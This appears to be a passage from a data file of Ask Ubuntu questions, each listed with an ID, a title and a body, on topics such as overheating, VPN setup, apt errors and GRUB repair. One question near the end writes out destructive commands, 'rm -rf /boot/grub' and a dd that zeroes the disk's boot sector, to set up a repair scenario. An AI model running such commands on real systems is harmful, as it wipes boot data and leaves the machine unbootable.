197440	overheating in hp pavillion dm4-2102eo laptop	the features are intel core i5 amd radeon temperatures are acpiz 55°c core 0 55°c core 1 56°c core 2 54°c radeon 66°c is that ok , what can i do ? this did not happen on windows 7 and the laptop is a new brand .
197441	how to add information indicators to a launcher icon from a script ?	some applications place informational text over their icons in the launcher . for example , thunderbird shows the unread message count , and update manager shows the number of updates available and a progress bar . the image shows these two examples : i have created some bash scripts that use yad ( a zenity fork ) , which adds an icon to the launcher while running . i would like to know how i can create my own information overlay within my script for those icons .
197444	how do i copy music files in order ?	is there a command to copy music files in order ? i need to copy mp3s which are in folders by `` artist - album '' to a usb stick . the mp3s must be copied in order , for example 01 can you feel it.mp3 should be copied before 02 skyway.mp3 .
197446	how do i modify these vpn connection settings for xfce ?	i have signed up for a vpn ( virtual private network ) service , and i configured it for use on my computer that runs gnome classic with the following instructions : in terminal , install openvpn packages with sudo apt-get install network-manager-openvpn . 1 . restart the network manager with sudo restart network-manager 2 . run sudo wget https : //www.xxxxxxx.com/ovpnconfigure.zip 3 . extract the files from the zip with unzip ovpnconfigure.zip . 4 . move cert.crt to /etc/openvpn 5 . open the network manager on the menu bar . 6 . choose add and select the openvpn connection type , and click create . 7 . enter private internet access ssl for the connection name . 8 . enter xxxxxx.xxxxxxxx.com for the gateway 9 . select password and enter your login credentials . 10 . browse and select the ca certificate we saved in step 3 . 11 . choose advanced and enable lzo compression . 12 . apply and exit . 13 . connect using the network manager . it worked , but now i want to set up access to the same vpn service on another machine that runs mythbuntu , which uses xfce as its desktop manager . so every point from 5 on does n't apply . how can i modify the above instructions so that i can get my vpn service working with xfce . as a further note , while i can access the xfce desktop directly if i need to , it 's more convenient for me to access it via the command line and ssh from on of my other computers . a command line process would be ideal . ( i looked for this , and found instructions only for pptp access , whereas i need openvpn . )
197451	how to change the font for a pdf file	i would love to change the default font that comes with a pdf that i have , i would like to pick one from my system font cache : how i can do that ? i am used with evince but any pdf reader will be fine if will support custom fonts .
197452	gnome shell task switcher and wine applications : only generic icon displayed	when switching applications with the task switcher in gnome shell , only the generic `` glass of wine '' icon is displayed . this is the same for all wine apps i tried . icons in the activities menu are fine . you can see the problem in this screenshot : is there a way to change this ? ps : i 'm using ubuntu 12.04
197456	wubi install freezes on startup	ok , i do n't completely know of all the specifications , but installing ubuntu 12.04.1 on my cousin 's old windows xp computer , an old compaq from around 2004 . after install via wubi , and going through several unsuccessful install attempts , i finally get the start up screen of ubuntu , and it freezes once you get to the pretty default wallpaper . not even a login screen . just instant freeze ! we 've left it on for about a day now and its still frozen , any help ? ( please reply asap , he wont stop bugging me about it )
197459	how to fix `` sudo : unable to open ... read-only file system '' ?	the title might not be as descriptive as i would like it to be but could n't come up with a better one . my server 's file system went into read-only . and i do n't understand why it does so and how to solve it . i can ssh into the server and when trying to start apache2 for example i get the following : username @ srv1 : ~ $ sudo service apache2 start [ sudo ] password for username : sudo : unable to open /var/lib/sudo/username/1 : read-only file system * starting web server apache2 ( 30 ) read-only file system : apache2 : could not open error log file /var/log/apache2/error.log . unable to open logs action 'start ' failed . the apache error log may have more information . when i try restarting the server i get : username @ srv1 : ~ $ sudo shutdown -r now [ sudo ] password for username : sudo : unable to open /var/lib/sudo/username/1 : read-only file system once i restart it manually it just start up without any warning or message saying something is wrong . i hope somebody could point me into the right direction to resolve this issue .
197461	how to set manpath without overriding defaults ?	i have added extra directories to $ path by exporting path=/my/dirs : $ path but i am not sure if i should do the same to manpath . because default manpath is empty yet man command works . i found a command called manpath and its manual says if $ manpath is set , manpath will simply display its contents and issue a warning.. does this mean setting manpath is not the right way to add directories for man command to search for manual pages ?
197464	failed to download repository information	when i clicked check this error message came up . but it does not come up when update manager strarts automatically . when you open update manager this error comes up . any ideas on how to fix it ? details : *w : gpg error : ( http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey fc8ca6fe7b1fec7c , w : failed to fetch ( http : //ppa.launchpad.net/jonabeck/ppa/ubuntu/dists/precise/main/binary-amd64/packages 404 not found , w : failed to fetch ( http : //ppa.launchpad.net/jonabeck/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found , w : failed to fetch ( http : //ppa.launchpad.net/jonabeck/ppa/ubuntu/dists/precide/main/source/sources 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . *
197469	syncing deleted folders	why is a deleted folder under `` ubuntu one '' is not deleted in the cloud ? i 'm using ubuntu one for windows on 2 different computers .
197470	how can i get geforce gt630m working ?	i have this hp 5008tx laptop : core i5 ( 2nd generation ) 2450m 6 gb ram ddr3 mobile intel hm77 express nvidia geforce 630m 2 gb ddr3 i 'd just installed 12.04lts 64-bit ( kernel 3.2.0-23-generic )
197473	overheating in laptop sony vaio vpccb	i own a sony vaio laptop vpccb . i have ubuntu 12.04 installed side-by-side with windows 7. while using ubuntu the laptop gets heated a lot compared to windows and the fan keeps spinning continuosly . i have jupiter installed please help ... .
197475	startup problem : the disk drive /dev/mapper/cryptswap1 is not ready yet or not present	during startup the message above pops up , it has something to do with mounting . however if i do n't choose any of the options and just wait , ubuntu loads normally . i am using ubuntu as my only os . how can i fix this ? i am really new to ubuntu , so i would really appreciate a step-by-step answer . alex
197477	problem with getting 2.1 speaker working under 12.04/unity/pulseaudio	i have been using askubuntu extensively and now i am going to ask my first question here . i am trying to get my 2.1 speaker working on my thinkpad x60 and a 12.04lts/unity/pulseaudio ( 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) ) . the front left/right is working fine , but i can not get the lfe/subwoofer working . here is a subset of my pulseaudio conf : enable-lfe-remixing = yes ... default-sample-channels = 3 default-channel-map = front-left , front-right , lfe i also notice the server sample tab in paman shows : default sample type : s16le 3ch 44100hz however in the device tab , the property of the sink is always s16le 2ch 44100hz . i also tried modify default.pa ( load-module module-remap-sink or module-alsa-sink ) but it either does n't work or switch to digital output which have no output at all . any idea will be very appreciated as this is something i have spent a whole morning to try to figure out ...
197478	weird software centre issue	noticed this behavior from ubuntu software centre today . a few seconds later , i right clicked and the image changed as i first opened those games and went back to the previous screen as the images are taking a while to load . but later i opned gparted and waited till the image of software to appear but was presented as shown in above pictured . i did n't find any better place to mention this probable bug .
197479	versioning a package for uploading to ppa	i 've a package named artha which i distribute as source and ( deb ) binaries for x86 and x86_64 architectures i.e . i 've the experience in making deb files . i got quite a few requests for setting up a ppa . i thought i 'll do it for the upcoming release . artha in ubuntu 's repository is of version 1.0.2 and i 'm trying to create a ppa for artha 1.0.3 . i read launchpad 's personal package archive docs , and the ppa is now set up , but this page on versioning says that for a package like artha which is already in ubuntu 's repos , named artha-1.0.2-1ubuntu1 the ppa version should be artha-1.0.3-1ubuntu1ppa1 , so that when ubuntu 's repos update to 1.0.3 of artha , it supersedes my ppa 's package . when i usually make my .deb package , i get these files artha_1.0.3.orig.tar.bz2 artha_1.0.3-1.debian.tar.gz artha_1.0.3-1.dsc artha_1.0.3-1_amd64.build artha_1.0.3-1_amd64.changes artha_1.0.3-1_amd64.deb and their equivalents for i386 . this page on uploading to a ppa says that the files .dsc , .changes and .debian.tar.gz will be uploaded . here 's my confusion . how 'd i make these files have the aforementioned version ? i.e . with the `` ppa '' suffix ? surely , i feel , manually renaming artha 's source package extracted directory does n't seem the right way . also should i debuild -s -sd or debuild -s -sa ? the launchpad page says alternative version of an existing package should use the former . this sounds ambiguous for me . what does this mean ? does an updated version count as an alternative version ? there 're many detailed pages on setting up a ppa . but they 're for setting up only once , while ppas are all about giving updates to a particular package faster and maintainability is very important , i 'd be great if someone could point me to such a document which talks about making updates , etc . i.e . about things that happen to a ppa after the initial upload .
197480	wayland performance on video cards	i have read way too many reports/blogs/news about it , but have yet to come up with a way to be sure so i will ask here : will wayland have any performance enhancements with video cards ( higher fps , better quality , less resource usage ) in comparison to using x ? updated posts include : ubuntu 13.04 will enable wayland support in gtk+ good news in launchpad regarding wayland support
197481	can not add extensions in chrome	i tried to integrate steadyflow download manager with chrome by installing chromeflow found at launchpad.net , but i recieve error that extensions can only be installed from chrome web store . i would also like to know if this can be done in chromium or does it restrict similar to chrome ?
197482	burned dvd essentially has no content and the dvd is not bootable when creating on mac osx	i have been unsuccessful when burning downloaded isos to a dvd on osx - the burned dvd essentially has no content and the dvd is not bootable . i 've tried ubuntu versions of 11.x and 12.04 with no success . further , i took the dvd out of an ubuntu unleashed book ( v11.x ) , and am unable on several osx laptops to read the dvd . the applications to manage iso disks on osx are really straightforward , and they properly function with isos of other linux distributions . is there a problem with ubuntu 's ? or is it just me ?
197483	wubi virtual disk default limit 32gb	according to the wubi-resize script readme file , it is not recomended to resize the wubi virtual disk with a new disk of more then 32gb , allthough an override option is provided . for some strange reason ( might have to do with the dvds i 'm using or the bluray reader , i gave up on that one ) i can not run the live install cd on my laptop , so i 'm stuck with the virtual install . i reserved a 120gb ntfs primary partition for ubuntu , and installed the 64bit version of ubuntu 12.04 . in windows 7 i can see the ubuntu folder and about 113gb free on the reserved partition . i wonder what kind of risks am i running to if i override the setted limit .
197486	get geforce gt630m driver issue	i have this hp pavilion 5008tx laptop : core i5 ( 2nd generation ) 2450m 6 gb ram ddr3 mobile intel hm77 express nvidia geforce 630m 2 gb ddr3 i 'd just installed 12.04lts 64-bit ( kernel 3.2.0-23-generic ) .after updating using sudo apt-get update & & sudo apt-get upgrade after reboot i got a screen resolution of 640x480 . i ran nvidia-settings and it said you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . sudo apt-get purge nvidia-current and after it edited grub file using vim : : sudo gedit /etc/default/grub and replace : : grub_cmdline_linux= '' '' to grub_cmdline_linux= '' nomodeset '' update grub : : sudo update -grub and then screen resolution set to 4:3 800x600 i downloaded nvidia driver from here installed it command : : sudo service lightdm stop sudo sh nvidia-linux-x86_64-304.51.run sudo service lightdm start sudo reboot after this still screen resolution is 800x600 i ran nvidia-settings and it said : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . and i can not change my screen resolution .
197487	how to create an internet connection using cable in ubuntu 12.04 lts ?	i downloaded the new version of ubuntu , but i do not know how there furnish an internet connection . it would be very nice if someone would take the trouble to explain to me all the required steps in detail . if it helps further : it 's lan wie erstelle ich eine internetverbindung mit kabel bei ubuntu 12.04 lts ? ich habe mir die neue version von ubuntu heruntergeladen , aber ich weiß nicht wie ich dort eine internetverbindung einrichte . es wäre sehr nett , wenn sich jemand die mühe machen würde und mir alle dazu notwendigen schritte ausführlich erklärt . wenn es weiter hilft : es ist lan
197492	ubuntu cd not booting !	i am trying dual booting ubuntu 12.04.01 lts with windows 7 . so i downloaded the iso from the site , burned it on a dvd . now when i run wubi.exe ( as auto play ) it says pemission denied . after googling it , i found that it is just a bug and that it is properly installed already . now i am trying to boot the laptop with the disc inside , its just starting to boot to windows 7 again . please help !
197494	how to disable track stick dell lattitude without using a mouse	the track stick is jamming the cursor down in the lower right corner . root shell command is only way to control - xinput not installed - do n't know how to do much with ubuntu . xp not working too due to cursor ...
197498	how to create partitons while installing ubuntu 12.04	i have windows 7 . i want to install ubuntu 12.04 into my system in a separate partition . i had made four partitions in windows : windows ( 100gb ) ubuntu ( 98.5gb ) personal ( 500gb , logical ) note : all are ntfs partions . i want ubuntu to be installed in partion ubuntu created by me . can anyone give a detailed procedure of how to do it . ubuntu and windows partion are primary , ntfs partitions . my ram is 8gb .
197504	cuda installation in 12.10 quantal quetzal	i updated from 12.04 to 12.10 and cuda is not working anymore ! blender says : `` cuda kernel compilation failed '' . but opencl works ( but is much slower than cuda ) ! on precise cuda worked just fine ! is there a difference in 12.10 on how to install cuda ? i already searched the web for installation instructions for 12.10 and did n't find a solution . has anyone the same problem or already installed cuda on 12.10 ? i would be very greatful for any help or an installation instruction !
197507	note book is getting very hot when using ubuntu 12.04	i have bought a toshiba satellite pro l850 note book . it already has preinstalled windows 7 professional . i have installed ubuntu 12.04 and now my note book have two operating systems . the problem is , my note book is getting very hot only if i load ubuntu . it is working fine with windows 7 . can any one tell why this is happening ? and can anyone suggest a solution for this problem ? i really want use ubuntu in my laptop . thanks in advance .
197511	error when using ffmpeg	i 'm trying to create a video file from a series of jpgs using the following command : - ffmpeg -f image2 -i img*.jpg -s 640x480 movie.mpg but it fails after generating a lot of output with the following : - < lots of output , removed > stream # 0.0 - > # 89.0 stream # 0.0 - > # 90.0 stream # 0.0 - > # 91.0 stream # 0.0 - > # 92.0 press [ q ] to stop encoding [ mjpeg @ 0x95dfac0 ] get_buffer ( ) failed ( -1 0 0 ( nil ) ) video encoding failed what 's causing the error and how can i fix it ?
197512	which compression format will give the least size	hi i have a few gbs of files which i am supposed to burn to a dvd for permanent storage , which compression format will give me `` least '' size , thanks
197515	do-release-upgrade hangs at downloading openjdk-6-jre-headless	i 'm trying to do do-release-upgrade ( also tried the graphical version before - same issue with less details ) . it always get stuck downloading openjdk-6-jre-headless . the exact line 3 % [ 18 openjdk-6-jre-headless 27.1 mb/27.3 mb 99 % ] it always exactly downloads 27.1 mb , then stops and then it tries again . i already changed the server but no difference ( tried http : //de.archive.ubuntu.com/ubuntu/ and http : //en.archive.ubuntu.com/ubuntu/ so far ) . the direct link to the file is this . this file is about 26 mb ( again different ? ) . why is this ? what 's the problem ? how can i fix it ? or work around it ? there are some similar questions , e.g . here orhere . the suggestions can not really be applied for do-release-upgrade , though ( or at least i do n't know how ) .
197516	switchable graphics in ubuntu	i recently started using ubuntu and a like it a lot . however windows in my acer laptop had a function that made the graphics switch to a lower quality ( or something ) whenever i did n't have the charger plugged in . in ubuntu it does n't seem work cause my computer is practically eating battery power . i guess this has something to do with the drivers , witch i heard is a bit of a problem in all linux systems . can it be solved in an not too advanced way ? i know many people have asked the same question and it looks like its solvable , but is there someone that could explain how to do it in a more pedagogic way ? because i do n't really understand the answers to similar questions . i would appreciate it a lot . anton
197519	unable to mount read-only dvd with photos	i have a working samsung cd/dvd player with ( sata connection ) and i 'm running latest updated version of 12.04 . audio cds and video dvds appear in the devices sidebar , but i have a dvd from a professional photographer with pictures of my daughter and friends which will just not open . when i try to mount in terminal i get the following message : mount : block device /dev/sr0 is write-protected , mounting read-only mount : you must specify the file system type i am assuming it 's jpeg . what should i do next ? i have looked through previous questions in this area but none seems to address this particular problem . thanks for any help .
197521	how to install in efi mode with encrypted lvm ?	i 'm trying to properly install ubuntu 12.04.1 lts 64-bit pc ( amd64 ) with the alternate install cd `` .iso '' on a lenovo thinkpad x220 . default hard disk ( with a pre-installed version of windows 7 ) has been replaced with a brand new ssd . the uefi bios of the lenovo thinkpad x220 is set to `` uefi boot only '' & `` usb uefi bios support '' is enabled ( i 'm using an external usb dvd reader to perform ubuntu installation ) . the bios is a phoenix securecore tiano , bios version is 8det56ww ( 1.26 ) . the attempts below are made with the uefi bios settings described above . here 's what i 've tried so far : boot on a live gparted cd create a gpt partition table create a fat32 partition for uefi system , set the partition to `` ef00 '' type ( `` boot '' flag ) leave remaining space unformated boot on ubuntu 12.04.1 lts 64-bit pc ( amd64 ) with alternate cd : perform the install with network updates enabled use manual partitioning fat32 partition created with gparted is used as `` efi system partition '' remaining space is set to be used as `` physical volume for lvm '' then `` configure encrypted volumes '' using the previous `` physical volume for lvm '' as the encrypted container , passphrase is setup . `` configure the logical volume manager '' creating a volume group using the encrypted container /dev/mapper/sda2_crypt creation of the logical volumes `` create logical volume '' , choosing the previously created volume group assign a mount point and file system to the logical volumes : lv-root for / lv-var for /var lv-usr for /usr lv-usr-local for /usr/local lv-swap for swap lv-home for /home note : /tmp would be in ram only using tmpfs bootloader step : neither my esp partition ( /dev/sda1 , /dev/sda or mbr ) seems to be the right place for grub , i get the following message ( x suffix is for demonstration only ) : unable to install grub in /dev/sdax executing 'grub-install /dev/sdax ' failed this is a fatal error . finish installation without the bootloader & reboot the system does n't start , there 's no efi/grub menu at startup . what are the steps to perform a clean and working installation of ubuntu 12.04.1 precise pangolin , 64bit version in u ( efi ) mode using the encrypted luks + lvm scheme described above ?
197527	packages been kept back	i tried both aptitude -y safe-upgrade and apt-get upgrade -f but in both cases , i get : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : ... ( long list ) 0 packages upgraded , 0 newly installed , 0 to remove and 903 not upgraded . i guess this resulted from several hacks where i tried to update my system ( trying to work around this problem ) . my question now : why are they kept back ? what can i do to install them ? on a similar question , i got the suggestion to just use apt-get dist-upgrade instead . however , that fails at the moment for me because of : e : could not perform immediate configuration on 'util-linux'.please see man 5 apt.conf under apt : :immediate-configure for details . ( 2 ) this is this problem .
197528	could not perform immediate configuration on 'util-linux '	i am trying to do apt-get dist-upgrade but i get the error : e : could not perform immediate configuration on 'util-linux'.please see man 5 apt.conf under apt : :immediate-configure for details . ( 2 ) how can i resolve this ?
197534	trying to overwrite ... which is also in package	i 'm trying to do apt-get install -f -o apt : :immediate-configure=0 ( just apt-get install -f does n't work currently for me ... ) which fails with unpacking libboost1.46-dev ( from ... /libboost1.46-dev_1.46.1-7ubuntu3_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libboost1.46-dev_1.46.1-7ubuntu3_i386.deb ( -- unpack ) : trying to overwrite '/usr/include/boost/aligned_storage.hpp ' , which is also in package libboost1.40-dev 1.40.0-4ubuntu4 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) and many similar errors . there are similar questions ( 1 , 2 ) already but the suggested solution is for dpkg and i do n't know how to apply that to apt-get . how can i resolve this ?
197536	running a startup program in terminal as sudo	i need to run a python script in a terminal , myscript.py at startup ( on lubunt ) . this script requires root . i 've setup a .desktop file that runs the following command : lxterminal -- command= '' python /home/d/jarvis/alarm.py & & /bin/bash '' the terminal window opens at startup and runs the script , but then closes when the python script returns an error ( because it 's not being run as root ) . when i change the exec= to this ... lxterminal -- command= '' sudo python /home/d/jarvis/alarm.py & & /bin/bash '' ... ( prefixing command with 'sudo ' ) which works . however , the terminal opens on startup and displays the [ sudo ] password for d : \ prompt , requiring me to input my password . i would like the execution of the python script at startup to be completely automatic with no user interaction . how can i accomplish this ?
197542	installed ubuntu 12.04.01 with windows xp but lost access to windows xp	the first time i tried to install ubuntu the installer installed it on my d drive . this resulted in only booting to windows xp with no access to ubuntu . i had to download a disk partitioning program to undo all of this . a tip from the internet said to create a partition on the c drive for ubuntu , so i did along with a swap partition . i did this manually because the installer on the cd would not do so and would not let me do so from within the installer program . with the fresh partitions created for ubuntu i let the installer do its thing . the computer rebooted and came up in ubuntu . i then installed wine and all was well . then i shut the computer down for the night . the next day i turned on the computer and it booted directly into ubuntu . i can see the windows partition and all the files but it will not allow me to switch to the windows xp os . does not even give me a choice to do so . i have reinstalled ubuntu several times and each time is the same , i can not access windows xp anymore . right now i am in a fresh install with only whatever the installer installed . how do i fix this ? ! i have tried the hold the shift key to see if something called grub shows up , but no . i tried shifting the order of boot in grub but that did not work either . i tried using easybcd but that will not run . one symptom i do not understand , my monitor will post a graphic when the computer reboots that the cable is disconnected , this is normal . then when the computer gets to the actual boot process it will display the splash screens etc and it did this for windows xp as well . but now something new has popped up , while booting ubuntu after where it probably should be showing me a menu to pick what os i want to boot , the monitor posts `` input unsupported '' until ubuntu loads . i have never seen it post this before , maybe a clue to someone .
197548	ubuntu wo n't load , freezes on purple screen	last time i restarted my computer , i could not get ubuntu to load ; the screen would either go black , or would hang at the purple screen indefinitely . i have had some graphics problems in the past , but had put 'nomodeset ' after 'quiet splash ' in the grub command line , which at least let ubuntu load . that does n't work now , and does n't work if i remove it . i looked up some answers , such as this one : purple start screen - no splash screen however , when i enter the root in recovery mode in grub , i always get errors when i run those command lines and it wo n't let me modify the files . also , if i run in recovery mode and then choose 'resume normal boot ' , it will continue . but instead of getting a usual interface , i get a black screen that asks for my username and password . i enter these , and it tells me i 'm in ubuntu 12.04 , but i 'm still on a black screen with texts . it also informs me that there are updates to install . when i use the command 'sudo apt-get update ' , it starts to retrieve the information , but then the screen goes blank after a couple of seconds and i ca n't do anything anymore . any ideas ?
197549	all gtk applications opened with warning `` assertion `gdk_error_traps ! = null ' failed ''	when opening any gtk application in the gnome-terminal i see the same warning gdk-critical ** : ia__gdk_error_trap_pop : assertion `gdk_error_traps ! = null ' failed do n't know how it comes . anyone knows how/where to fix it ? i 'm appreciative of knowing whether it 's a bug and where the bug report could be found . this thing kept showing up since i upgraded to 12.10 from 12.04 . and i 'm surprisingly impressed as if i 'm the only one bothered by this .
197552	what happens to my files when uninstalling ubuntu ( installed from wubi )	( original os win7 ) i 've installed ubuntu from wubi ( so i can easily uninstall it after i try it ) , i 've also installed some apps . i am wondering if i uninstall ubuntu , will all the files i created and apps i installed in ubuntu be removed as well or would i have to manually remove them after ?
197556	unable to mount hard drives	i am currently trying to backup data from my computer 's hard drive to an external one while live-booting to ubuntu from a usb , and i 've encountered a bit of a problem . you see , i can not mount my hard drives . whenever i try , i always get one of two errors : fuse : failed to access mountpoint [ file i 'm trying to mount to ] : no such file or directory or error mounting : mount exited with exit code 21 : mount : according to mtab , [ drive ] is already mounted on [ file i 'm trying to mount to ] how can i fix this ? edit : so it turns out that there was something wrong with the usb i was live-booting from . i just tried it with a different one and it worked fine .
197559	lyrics on mp3 id-tag	since a few years ago i stopped listening to cds and began to listen to mp3 only . at the begining i continued to buy the cds to support the artist , but later i started to buy the album direct online as mp3 . the problem is , that by this , i do n't have the lyrics for the songs . for the `` commercial '' or popular music it is not a big problem , but for others there are no lyrics on the internet . how can i make use of the id3-tag for the lyrics ? is there a music store that adds lyrics to the mp3 files sold ? can this be done with ubuntu one ? another alternative would be to have an internet lyrics databases like musixmatch.com supported .
197561	installing ubuntu with fake raid 1	i had : software : dual boot with windows xp ubuntu 10.04 lts x32 hardware fake raid 1 ( mirroring ) with 2x1 tb : partition 1 - windows partition 2 - swap partition 3 - / ( root ) partition 4 - extended partition 5 - /home partition 6 - /data arek @ domek : /var/log/installer $ sudo fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000de1b9 device boot start end blocks id system /dev/sda1 * 63 524297339 262148638+ 7 hpfs/ntfs/exfat /dev/sda2 524297340 528506369 2104515 82 linux swap / solaris /dev/sda3 528506370 570468149 20980890 83 linux /dev/sda4 570468150 1953118439 691325145 5 extended /dev/sda5 570468213 675340469 52436128+ 83 linux /dev/sda6 675340533 1953118439 638888953+ 83 linux disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000de1b9 device boot start end blocks id system /dev/sdb1 * 63 524297339 262148638+ 7 hpfs/ntfs/exfat /dev/sdb2 524297340 528506369 2104515 82 linux swap / solaris /dev/sdb3 528506370 570468149 20980890 83 linux /dev/sdb4 570468150 1953118439 691325145 5 extended /dev/sdb5 570468213 675340469 52436128+ 83 linux /dev/sdb6 675340533 1953118439 638888953+ 83 linux arek @ domek : /var/log/installer $ ls -l /dev/mapper/ total 0 crw -- -- -- - 1 root root 10 , 236 oct 7 20:17 control lrwxrwxrwx 1 root root 7 oct 7 20:17 pdc_jhjbcaha - > ../dm-0 lrwxrwxrwx 1 root root 7 oct 7 20:17 pdc_jhjbcaha1 - > ../dm-1 lrwxrwxrwx 1 root root 7 oct 7 20:17 pdc_jhjbcaha2 - > ../dm-2 lrwxrwxrwx 1 root root 7 oct 7 20:17 pdc_jhjbcaha3 - > ../dm-3 lrwxrwxrwx 1 root root 7 oct 7 20:17 pdc_jhjbcaha4 - > ../dm-4 lrwxrwxrwx 1 root root 7 oct 7 20:17 pdc_jhjbcaha5 - > ../dm-5 lrwxrwxrwx 1 root root 7 oct 7 20:17 pdc_jhjbcaha6 - > ../dm-6 i want to upgrade from 10.04 x32 to 12.04 x64 using fresh installation .
197562	crash during update deleted all panels ; ca n't open terminal ; ca n't see icons	so i was upgrading ubuntu from 11.10 to 12.04 in the terminal after recovering my system from a previous crash , and then i go through a power outage during the second time trying to update . now , my screen is white , only the time shows up in the top right corner , no icons show up , no apps show up , and terminal is not opening . i can still use the internet somehow , and ctrl+alt+f2 opens what i think is a back-up terminal ? need help to recover what is lost .
197564	how do i add a line to my /etc/apt/sources.list ?	i am updating my tor on ubuntu and it states : do not use the packages in ubuntu 's universe . you 'll need to set up our package repository before you can fetch tor . it then states that i have to add this line to your /etc/apt/sources.list file : deb http : //deb.torproject.org/torproject.org < precise > main i am uncertain how to add a line to /etc/apt/sources.list .
197566	how to make networkmanager not manage libvirtd 's virtbr0 and vnet0 interfaces ?	the libvirt-bin daemon libvirtd creates virtual bridge ( s ) and interface ( s ) for the virtual machines it controls . networkmanager kills these connections . i know that it is possible to uninstall or disable networkmanager , but i wish to use it to manage the real interfaces on my system . i also know that it may be possible to add lines to /etc/network/interfaces ; however , since libvirtd creates its interfaces dynamically , this seems a poor solution . how does one make network manager ignore all interfaces except eth0 and wlan0 ?
197574	do i leave the disc in or take it out when rebooting after installation ?	it says to re-start my computer . do i leave the disc in or take it out ? i 've tried several times , and it has n't worked either way .
197578	how can i install spyder and all its prerequisites in one click ?	there are like > 50 debian packages to download and install if you do it manually .
197585	how do i force my wireless card to use mode 802.11n ?	i 'm using a tp-link tl-wn781nd wireless n card with an ar9285 chipset and an ath9k driver on xubuntu 12.04.1 with network manager . 'iwconfig wlan1 ' shows that it 's using a bit-rate of 54 mb/s . is there a way ( e.g . through an 'options ' entry in '/etc/modprobe.d/ath9k.conf ' ) of forcing it to use mode n ? my router is doing 'mode b/g/n mixed ' .
197589	playonlinux is unable to find 32bits / 64bits opengl library	when i open a fresh instalation of playonlinux , it gives 2 dialog box as mentioned in title : playonlinux is unable to find 32bits opengl library playonlinux is unable to find 64bits opengl library i am using ubuntu 12.04 ( and new to it ) and would like to know how to solve this problem edit terminal output ~ $ playonlinux [ main ] message : playonlinux ( 4.1.8 ) is starting [ clean_tmp ] message : cleaning temp directory xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . [ check_opengl ] warning : xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . [ check_opengl ] warning : [ main ] message : filesystem is compatible [ install_plugins ] message : checking plugin : capture ... [ maj_check ] message : web version : 1349866727 [ maj_check ] message : current local version : 1349563245 [ maj_check ] message : updating list [ install_plugins ] message : checking plugin : screencap ... [ install_plugins ] message : checking plugin : playonlinux vault ... /usr/share/playonlinux/bash/startup_after_server : line 38 : [ : : integer expression expected /usr/share/playonlinux/bash/startup_after_server : line 38 : [ : : integer expression expected [ pol_config_write ] message : config write : last_timestamp 1349866727 edit nvidea print screens what it says :
197592	my tv is cutting the edges off my desktop	i have a mitsubishi ws 65315 tv , an ati radeon x1300 graphics card and ubuntu 12.04 . my problem is that i ca n't see the edges of the screen , so i ca n't get to the dash very easily and the whole point of hooking it up to the tv was for hulu and general media . so my question is , does anyone know how i can either move the axis of the desktop so i can see everything ? or is there any other kind of known problem like this ? thanks in advance
197593	changes to /etc/bash.bashrc not permanent	after a recent upgrade to 12.04 , auto tab completion was disable in /etc/bash.bashrc . i uncommented the following lines : if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi i tried to then run source /etc/bash.bashrc and . /etc/bash.bashrc but neither reloaded the config . they just gave me the error -sh : 1 : source : not found . typing in simply bash did seem to work and enabled auto tab completion . however after logging out of the server and then logging back in , i find that auto tab completion is not working again and the only way to get it working is to type bash again . anyone know what i need to do to make this change permanent ? edit : i just realized that when i initially ssh into the server , it just says $ . after running the bash command , it then says username @ machinename $ . not sure if this has anything to do with my problem or not ...
197595	what does this red icon on my panel mean ?	this red icon ... . it showed up after i upgraded to ubuntu 12.04lts ; i ca n't figure out how to ditch it . it seems to be a notification thing . i am at a loss . the icon is here : i clicked it and read this : an error occurred , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : 'error : brokencount > 0 ' . this usually means that your installed packages have unset dependencies .
197598	how to install grub2 under several common scenarios	i feel the community has long needed a clean guide on how to install grub2 under a a few extremely common scenarios . i will accept answer as solved when it has one section per scenario and assumes nothing other than what is specified . please add to the existing answer , wiki style , keeping to the original assumptions . rules : 1 . you can not , at any point in the answer , invoke ubiquity ( the ubuntu installer ) . 2 . i strongly recommend not using any automatic boor-repair tools as they 're not very educational scenario 1 : non-booting linux os , no boot partition , fix from live cd setup : /dev/sda1 is formatted ext* /dev/sda2 is formatted linux_swap /dev/sda1 does n't boot because mbr is scrambled and /boot/grub/* was erased would be the equivalent of running rm -rf /boot/grub and dd if=/dev/zero of=/dev/sda bs=440 count=1 explain : how to boot to a live cd / usb and restore grub2 to the mbr and /boot of /dev/sda1 scenario 2 : non-booting linux os , boot partition , fix from live cd setup : /dev/sda1 is formatted fat /dev/sda2 is formatted ext* /dev/sda3 is formatted linux_swap /dev/sda2 does n't boot because the mbr is scrambled and /dev/sda1 was formatted explain : how to boot to a live cd / usb and restore grub2 to the mbr and /dev/sda1 and then update the fstab on /dev/sda2 scenario 3 : install on to thumb drive , booting various oses , from linux os setup : /dev/sdb is removable media /dev/sdb1 is formatted fat /dev/sdb2 is formatted ext* /dev/sdb3 is formatted fat the mbr of /dev/sdb is otherwise not initialized you are executing from a linux based os installed on /dev/sda explain : how to install grub2 on to /dev/sdb1 , mark /dev/sdb1 active , be able to chose between /dev/sdb2 and /dev/sdb3 on boot . scenario 4 : ( bonus ) install on to thumb drive , booting iso , from linux os setup : /dev/sdb is removable media /dev/sdb1 